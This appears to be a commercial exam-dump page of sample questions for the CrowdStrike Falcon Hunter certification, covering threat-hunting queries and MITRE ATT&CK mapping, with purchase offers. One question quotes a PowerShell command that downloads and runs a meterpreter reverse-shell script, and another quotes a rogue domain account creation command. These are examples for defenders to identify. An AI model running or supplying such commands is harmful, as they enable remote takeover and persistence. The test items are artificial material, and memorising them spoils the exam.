Spring Sale 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: clap70

CCFH-202b CrowdStrike Certified Falcon Hunter Questions and Answers

Questions 4

You are investigating a process tree where WmiPrvSE launched PowerShell with the following command:

powershell.exe Windowstyle Hidden noprofile noexit -c IEX ((New-Object Net.WebClient).Downloadstring('https://raw.githubusercontent.com/.../Invoke-Shellcode.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 172.17.0.21 -Lport 8080 -Force

What is this command doing?

Options:

A.

Using PowerShell to perform a discovery scan of 172.17.0.21 on port 8080

B.

Utilizing PowerShell to force a connection to a reverse shell originating from GitHub

C.

Utilizing PowerShell to download a reverse shell from GitHub and executing it to create a connection

D.

Using WMI to update the PowerShell execution policy on a remote host

Buy Now
Questions 5

A compromised host shows evidence that the net user hacker password!23 /add /domain command was executed. Which MITRE ATT & CK technique does this align with?

Options:

A.

Account Manipulation

B.

Acquire Access

C.

Valid Accounts

D.

Create Account

Buy Now
Questions 6

You identify an instance of a user in your environment utilizing a Cloudflared tunnel daemon, resulting in unusual command line activity. What steps would you take to determine if the unusual activity is malicious or legitimate?

Options:

A.

Block all instances of Cloudflared in your environment and perform a forensic investigation into the host

B.

Create a forensic image of the hard drive and analyze it for indicators of compromise

C.

Immediately network contain the host and perform a forensic investigation into the host

D.

Review the specific commands associated and compare them with known legitimate use cases to confirm if patterns align with normal operations

Buy Now
Questions 7

According to the MITRE ATT & CK Framework, if an adversary is trying to Gain Access by Credential Access via OS Credential Dumping, what is the specific attacker's technique that you can also use as a filter on the detections page to find similar activities?

Options:

A.

Gain Access

B.

OS Credential Dumping

C.

Credential Access

D.

Lateral Movement

Buy Now
Questions 8

You want to hunt for the least-used Windows services that are starting from non-standard locations. Which query below will provide this information?

Options:

A.

#event_simpleName=ServiceStarted ImageFileName!=/(\\servicing\\|\\SysWOW64\\)/i | groupBy([ServiceDisplayName], function=[collect([ImageFileName] ), count(as=count)], l imit=20000) | sort(field=count, limit=20000, order=asc)

B.

#event_simpleName=ServiceStarted ImageFileName!=/(\\servicing\\|\\Services\\)/i | groupBy([ServiceDisplayName], function=[collect([ImageFileName] ), count(as=count)], limit=20000) | sort(field=count, limit=20000, order=asc)

C.

#event_simpleName=ServiceStarted ImageFileName!=/(\\servicing\\|\\System32\\)/i | groupBy([ServiceDisplayName], function=[collect([ImageFileName] ), count(as=count)], limit=20000) | sort(field=count, limit=20000, order=asc)

D.

#event_simpleName=ServiceStarted ImageFileName=/(\\System32\\)/i | groupBy([ServiceDisplayName], function=[collect([ImageFileName] ), count(as=count)], limit=20000) | sort(field=count, limit=20000, order=asc)

Buy Now
Questions 9

You suspect one of your endpoint host systems may have a vulnerable BIOS version. Which Investigate Dashboard will confirm vulnerability information such as the type and timeline?

Options:

A.

BIOS Prevalence

B.

BIOS Analysis

C.

BIOS Search

D.

BIOS Firmware Inventory

Buy Now
Questions 10

Refer to the image. Which query will show file execution from a suspicious directory across all hosts?

Options:

A.

#event_simpleName=ProcessRollup2 | aid=* | ImageFileName=/\\Users\\[^\\]+\\Desktop\\/i | groupBy(aid, function=collect([SHA256HashData, ImageFileName] ), limit-max)

B.

#event_simpleName=ProcessRollup2 | aid=c28082797f7f4d81b3f869dbaf6eb712 | ImageFileName=/\$Recycle\.Bin/i | groupBy(aid, function=collect([SHA256HashData, ImageFileName]), limit-max)

C.

#event_simpleName=ProcessRollup2 | aid=* | ImageFileName=/\$Recycle\.Bin/i | groupBy(aid, function=collect([SHA256HashData, ImageFileName]), limit-max)

D.

#event_simpleName=ProcessRollup2 | aid=* | ImageFileName=/\\Users\\[^\\]+\\Downloads\\/i | groupBy(aid, function=collect([SHA256HashData, ImageFileName] ), limit-max)

Buy Now
Questions 11

Refer to the image.

What line item of the query is used to perform outlier analysis?

Options:

A.

Line 6

B.

Line 3

C.

Line 4

D.

Line 7

Buy Now
Questions 12

During an investigation, you discover a Falcon host connecting from a country outside of those you normally do business with. Which built-in report would display Falcon hosts connecting from that country?

Options:

A.

Geo location activity

B.

Attack Paths

C.

Remote access graph

D.

Global connection heat map

Buy Now
Questions 13

Your team received a detection regarding a potentially malicious binary executing on an endpoint. Using CQL (CrowdStrike Query Language), you want to identify all events that relate to this detection. Which field is used to correlate events to this detection?

Options:

A.

TreeId

B.

ParentProcessId

C.

event_simpleName

D.

ComputerName

Buy Now
Questions 14

You get a detection for a malicious PowerShell script with the process flow below:

Unknown Process - > chrome.exe - > wscript.exe - > powershell.exe Which process should you investigate further to identify the source of the script?

Options:

A.

chrome.exe

B.

wscript.exe

C.

Unknown Process

D.

powershell.exe

Buy Now
Questions 15

You want to find all executions of a file on older Windows operating systems. You also want to include the Windows OU and focus on OUs with highly privileged systems and users. Which query will include the file name, operating system, and OU?

Options:

A.

#event_simpleName=ProcessRollup* FileName=file.exe | match(file="aid_master_main.csv", field=[aid], include=[Version, OU] )

B.

#event_simpleName=ProcessRollup* FileName=file.exe | selfjoin(file="aid_master_main.csv", field=[aid], include=[Version, OU] )

C.

#event_simpleName=ProcessRollup* FileName=file.exe | lookup(file="aid_master_main.csv", field=[aid], include=[Version, OU] )

D.

#event_simpleName=ProcessRollup* FileName=file.exe | join(file="aid_master_main.csv", field=[aid], include=[Version, OU] )

Buy Now
Questions 16

You are searching for all events related to a specific process. Which fields should be selected in a query?

Options:

A.

TargetProcessId and ContextProcessId

B.

ContextProcessId and timestamp

C.

timestamp and TargetProcessId

Buy Now
Questions 17

A detection contains a suspicious process named "reallysus.exe". This process has a TargetProcessId of 123456789. Which query will return all of the events associated with this process?

Options:

A.

TargetProcessId=123456789 OR ParentProcessId=123456789 OR RpcClientProcessId=123456789

B.

#event_simpleName=ProcessRollup2 FileName=reallysus.exe

C.

#event_simpleName=ProcessRollup2 TargetProcessId=123456789

D.

TargetProcessId=123456789 OR ContextProcessId=123456789 OR RpcClientProcessId=123456789

Buy Now
Questions 18

Which document can reference any searchable event and its description?

Options:

A.

Events Index

B.

Query Builder

C.

Advanced Event Search

D.

Events Full Reference (Events Data Dictionary)

Buy Now
Exam Code: CCFH-202b
Exam Name: CrowdStrike Certified Falcon Hunter
Last Update: Apr 5, 2026
Questions: 60
CCFH-202b pdf

CCFH-202b PDF

$25.5  $84.99
CCFH-202b Engine

CCFH-202b Testing Engine

$30  $99.99
CCFH-202b PDF + Engine

CCFH-202b PDF + Testing Engine

$40.5  $134.99